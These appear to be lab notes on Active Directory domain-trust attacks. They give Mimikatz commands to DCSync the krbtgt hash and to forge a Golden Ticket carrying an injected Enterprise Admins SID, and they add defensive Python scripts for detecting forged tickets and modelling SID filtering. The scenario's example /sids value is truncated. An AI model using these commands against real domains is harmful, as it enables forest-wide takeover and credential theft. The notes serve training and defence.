
Domain Trusts

Info: The key concept behind exploiting domain trusts is that if we take control of the root domain, we are in a position to compromise all of the regional domains.


Domain trusts are a mechanism that lets users in one domain gain access to resources in another domain.

For the most part, trusts define how the domains inside a forest communicate with each other. In some environments, trusts can also be extended to external domains and even to other forests. (A forest is a collection of one or more domain trees inside an AD network.)

There are two main types of trust that can be configured between domains:

  • Directional - The direction of the trust flows from a trusting domain to a trusted domain
  • Transitive - The trust relationship extends beyond just two domains to include other trusted domains

KRBTGT and Golden Tickets

Required Privileges: Administrators

KRBTGT is the account used by Microsoft's implementation of Kerberos. It acts as the service account for the Key Distribution Center (KDC) service, which handles all Kerberos ticket requests, and its key is used to encrypt and sign every Kerberos ticket in the domain. Since the password hash is shared by all domain controllers, each of them can verify the authenticity of a TGT presented by a user requesting access to resources.


Generating our own TGTs to grant ourselves access to everything is known as a Golden Ticket attack. In a Golden Ticket attack we bypass the KDC altogether and create our own TGTs, essentially becoming a Ticket Granting Server (TGS) ourselves.

In order to forge TGTs, we need the following information:

  • FQDN of the domain
  • Security Identifier (SID) of the domain
  • Username of the account we want to impersonate
  • KRBTGT password hash

Recovering the KRBTGT hash requires a domain compromise, since the KRBTGT password hash is only stored on domain controllers. From an elevated Mimikatz session, DCSync the account:

privilege::debug
lsadump::dcsync /user:za\krbtgt
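From the defender's side, the property that makes a forged TGT detectable is the one the text just described: the ticket never passed through the KDC, so no domain controller ever logged a TGT request (Event ID 4768) for it, yet service ticket requests (4769) and logons (4624) that rely on it still appear. The script below is an added example, not part of the original notes, and runs two well-known heuristics over constructed sample events whose field names follow the Windows Security log schema (TargetUserName, TargetDomainName, IpAddress, ServiceName, AuthenticationPackageName): a 4769 with no 4768 for the same account and client within the TGT lifetime, and a Kerberos 4624 whose Account Domain is an FQDN rather than the NetBIOS name, an artifact of tickets forged with a /domain:za.adobe.loc style argument. The 10-hour window and the sample data are assumptions made for the example.

```python
from datetime import datetime, timedelta

# Default "Maximum lifetime for user ticket" domain policy (10 hours). A legitimate
# TGS request (4769) must be backed by a TGT request (4768) no older than this.
TGT_MAX_LIFETIME = timedelta(hours=10)

# Constructed sample events, not real captures. Field names follow the Windows
# Security log schema for Event IDs 4768 (TGT requested), 4769 (service ticket
# requested) and 4624 (logon). Only the fields the heuristics use are present.
SAMPLE_EVENTS = [
    # Legitimate session: TGT first, then a service ticket, then the logon
    {"EventID": 4768, "Time": "2024-05-01T08:00:00", "TargetUserName": "alice",
     "TargetDomainName": "ZA.ADOBE.LOC", "IpAddress": "::ffff:10.200.1.50"},
    {"EventID": 4769, "Time": "2024-05-01T08:00:05", "TargetUserName": "alice@ZA.ADOBE.LOC",
     "TargetDomainName": "ZA.ADOBE.LOC", "IpAddress": "::ffff:10.200.1.50", "ServiceName": "THMDC$"},
    {"EventID": 4624, "Time": "2024-05-01T08:00:06", "TargetUserName": "alice",
     "TargetDomainName": "ZA", "IpAddress": "10.200.1.50", "LogonType": 3,
     "AuthenticationPackageName": "Kerberos"},
    # Suspicious session: a service ticket appears although no DC ever issued a TGT
    {"EventID": 4769, "Time": "2024-05-01T09:30:00", "TargetUserName": "Administrator@ZA.ADOBE.LOC",
     "TargetDomainName": "ZA.ADOBE.LOC", "IpAddress": "::ffff:10.200.1.99", "ServiceName": "THMDC$"},
    {"EventID": 4624, "Time": "2024-05-01T09:30:01", "TargetUserName": "Administrator",
     "TargetDomainName": "za.adobe.loc", "IpAddress": "10.200.1.99", "LogonType": 3,
     "AuthenticationPackageName": "Kerberos"},
]


def _ts(event):
    return datetime.fromisoformat(event["Time"])


def _account(event):
    """Normalise 'user' and 'user@REALM' to a lowercase bare user name."""
    return event["TargetUserName"].split("@")[0].lower()


def _client_ip(event):
    """Drop the IPv4-mapped IPv6 prefix (::ffff:) that 4768/4769 record."""
    ip = event["IpAddress"]
    return ip[7:] if ip.lower().startswith("::ffff:") else ip


def find_tgs_without_tgt(events, window=TGT_MAX_LIFETIME):
    """Return 4769 events with no 4768 for the same account and client IP in the
    preceding window. A forged TGT is never issued by the KDC, so its first use
    shows up as a service ticket request with no TGT request behind it."""
    tgt_requests = [e for e in events if e["EventID"] == 4768]
    hits = []
    for e in events:
        if e["EventID"] != 4769:
            continue
        key = (_account(e), _client_ip(e))
        backed = any(
            (_account(t), _client_ip(t)) == key
            and timedelta(0) <= _ts(e) - _ts(t) <= window
            for t in tgt_requests
        )
        if not backed:
            hits.append(e)
    return hits


def find_fqdn_account_domain(events):
    """Return Kerberos logons (4624) whose Account Domain is an FQDN. Legitimate
    logons carry the NetBIOS name (ZA); a ticket forged with a /domain:za.adobe.loc
    style argument tends to carry the FQDN instead."""
    return [
        e for e in events
        if e["EventID"] == 4624
        and e.get("AuthenticationPackageName") == "Kerberos"
        and "." in e["TargetDomainName"]
    ]


if __name__ == "__main__":
    for e in find_tgs_without_tgt(SAMPLE_EVENTS):
        print(f"[!] 4769 without a matching 4768: {_account(e)} from {_client_ip(e)} -> {e['ServiceName']}")
    for e in find_fqdn_account_domain(SAMPLE_EVENTS):
        print(f"[!] FQDN in Account Domain of 4624: {e['TargetUserName']} @ {e['TargetDomainName']}")
```

The 4768/4769 correlation only works when the events of every domain controller in the domain are collected centrally, because the TGT may legitimately have been issued by a different DC than the one serving the service ticket. The FQDN heuristic is cheap but noisier and should be treated as a supporting indicator. Neither heuristic replaces the actual remediation after a KRBTGT compromise, which is resetting the KRBTGT password twice so that previously forged tickets stop validating.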


Inter-Realm TGTs

Using the KRBTGT password hash, we can now forge a Golden Ticket to access any resource in the child domain.

We can take this a step further by forging an inter-realm TGT. Inter-realm TGTs are used to provide access to resources in other domains (for example, abusing the bidirectional trust relationship between the child and parent domain to gain full access to the parent domain).

To do this, we include extra account SIDs from other domains when we construct the Golden Ticket.

We will exploit the trust the parent domain has with our child domain by adding the SID of the Enterprise Admins (EA) group as an extra SID to the ticket we forge for the child domain. The EA group belongs to the parent domain, and membership of this group essentially grants administrative privileges over the entire forest.


To exploit this, we need to recover two SIDs:

  • SID of the child domain controller (in this scenario THMDC), which we will impersonate in our forged TGT
  • SID of the Enterprise Admins group in the parent domain, which we will add as an extra SID to our forged TGT

# Recover the SID of the child domain controller (in this scenario THMDC)
Get-ADComputer -Identity "THMDC"

# Recover the SID of the Enterprise Admins group by querying the parent domain controller (in this scenario thmrootdc.adobe.loc)
Get-ADGroup -Identity "Enterprise Admins" -Server thmrootdc.adobe.loc
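The reason the injected Enterprise Admins SID is honoured is that parent/child trusts inside a forest do not filter SID history by default; on external trusts, quarantine-style SID filtering (netdom trust /quarantine:yes, visible as the SIDFilteringQuarantined attribute returned by Get-ADTrust) strips every SID that was not issued by the trusted domain. The script below is an added example, not part of the original notes, and models that filtering step so you can see exactly which SIDs a filtered trust would drop from a ticket like the one described above. The domain SIDs are constructed sample values; only the RIDs 512 (Domain Admins) and 519 (Enterprise Admins) are the real well-known ones.

```python
# Quarantine-style SID filtering applied to the extra SIDs an inter-realm TGT can
# carry. Added example, not part of the original notes. The domain SIDs are
# constructed sample values; RIDs 512 (Domain Admins) and 519 (Enterprise Admins)
# are the real well-known RIDs. Enterprise Admins exists only in the forest root.
DOMAIN_ADMINS_RID = 512
ENTERPRISE_ADMINS_RID = 519

CHILD_DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"   # constructed
PARENT_DOMAIN_SID = "S-1-5-21-4444444444-5555555555-6666666666"  # constructed


def split_sid(sid):
    """Split a SID into (domain_sid, rid). Domain SIDs are S-1-5-21-A-B-C[-RID];
    anything else (BUILTIN, well-known SIDs) has no domain part and yields None."""
    parts = sid.split("-")
    if len(parts) < 3 or parts[0] != "S" or not all(p.isdigit() for p in parts[1:]):
        raise ValueError(f"malformed SID: {sid}")
    if parts[1:4] == ["1", "5", "21"] and len(parts) in (7, 8):
        domain = "-".join(parts[:7])
        rid = int(parts[7]) if len(parts) == 8 else None
        return domain, rid
    return None, int(parts[-1])


def filter_extra_sids(trusted_domain_sid, extra_sids):
    """What SID filtering with quarantine does on a trust: the trusting domain keeps
    only SIDs issued by the trusted domain itself and drops everything else.
    Returns (kept, dropped) in the original order."""
    kept, dropped = [], []
    for sid in extra_sids:
        domain, _ = split_sid(sid)
        (kept if domain == trusted_domain_sid else dropped).append(sid)
    return kept, dropped


def is_enterprise_admins(sid, forest_root_sid):
    """True only for RID 519 issued by the forest root domain."""
    domain, rid = split_sid(sid)
    return domain == forest_root_sid and rid == ENTERPRISE_ADMINS_RID


def audit_ticket(trusted_domain_sid, forest_root_sid, extra_sids):
    """Report which extra SIDs a filtered trust would strip and whether any of them
    would have granted forest-wide Enterprise Admins membership."""
    kept, dropped = filter_extra_sids(trusted_domain_sid, extra_sids)
    ea_injected = any(is_enterprise_admins(s, forest_root_sid) for s in extra_sids)
    return {"kept": kept, "dropped": dropped, "enterprise_admins_injected": ea_injected}


if __name__ == "__main__":
    # A ticket issued by the child domain that carries the child's own Domain Admins
    # SID (legitimately from the trusted domain), the parent's Enterprise Admins SID
    # (the injected one from the notes above) and a BUILTIN SID.
    forged = [
        f"{CHILD_DOMAIN_SID}-{DOMAIN_ADMINS_RID}",
        f"{PARENT_DOMAIN_SID}-{ENTERPRISE_ADMINS_RID}",
        "S-1-5-32-544",
    ]
    report = audit_ticket(CHILD_DOMAIN_SID, PARENT_DOMAIN_SID, forged)
    for sid in report["kept"]:
        print(f"kept    {sid}")
    for sid in report["dropped"]:
        print(f"dropped {sid}")
    print("Enterprise Admins SID present:", report["enterprise_admins_injected"])
```

Running it shows the child's own Domain Admins SID surviving while the parent's Enterprise Admins SID and the BUILTIN SID are stripped, which is exactly what an external trust with quarantine enabled would do to this ticket. Within a forest that filtering is not applied, and Microsoft documents the forest, not the domain, as the security boundary for precisely this reason: a compromised child domain has to be treated as a compromise of the whole forest.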


Exploiting Domain Trusts

We can use Mimikatz to generate the Golden Ticket, passing the Enterprise Admins SID via /sids and injecting the result into the current session with /ptt:

privilege::debug
kerberos::golden /user:Administrator /domain:za.adobe.loc /sid:S-1-5-21-3885271727-2693558621-2658995185-1001 /service:krbtgt /rc4:<Password Hash of krbtgt User> /sids:<SID of Enterprise Admins Group> /ptt

:: Example with this scenario's values
kerberos::golden /user:Administrator /domain:za.adobe.loc /sid:S-1-5-21-3885271727-2693558621-2658995185-1001 /service:krbtgt /rc4:16f9af38fca3ada405386b3b57366082 /sids:S-1-5-21-3330634377-1326264276-63


Verifying the Access

First, we verify that the ticket grants access to THMDC, since it is a valid ticket for the Administrator user of the child domain. This confirms that the Golden Ticket was forged correctly for the child DC.

We can also verify that the tickets were injected correctly with the Windows built-in command klist.

:: List the contents of the C$ share on the child DC
dir \\thmdc.za.adobe.loc\c$

:: Display the currently cached Kerberos tickets
klist

If we specified extra SIDs, we should now also have access to the parent DC.

:: List the contents of the C$ share on the parent DC
dir \\thmrootdc.adobe.loc\c$\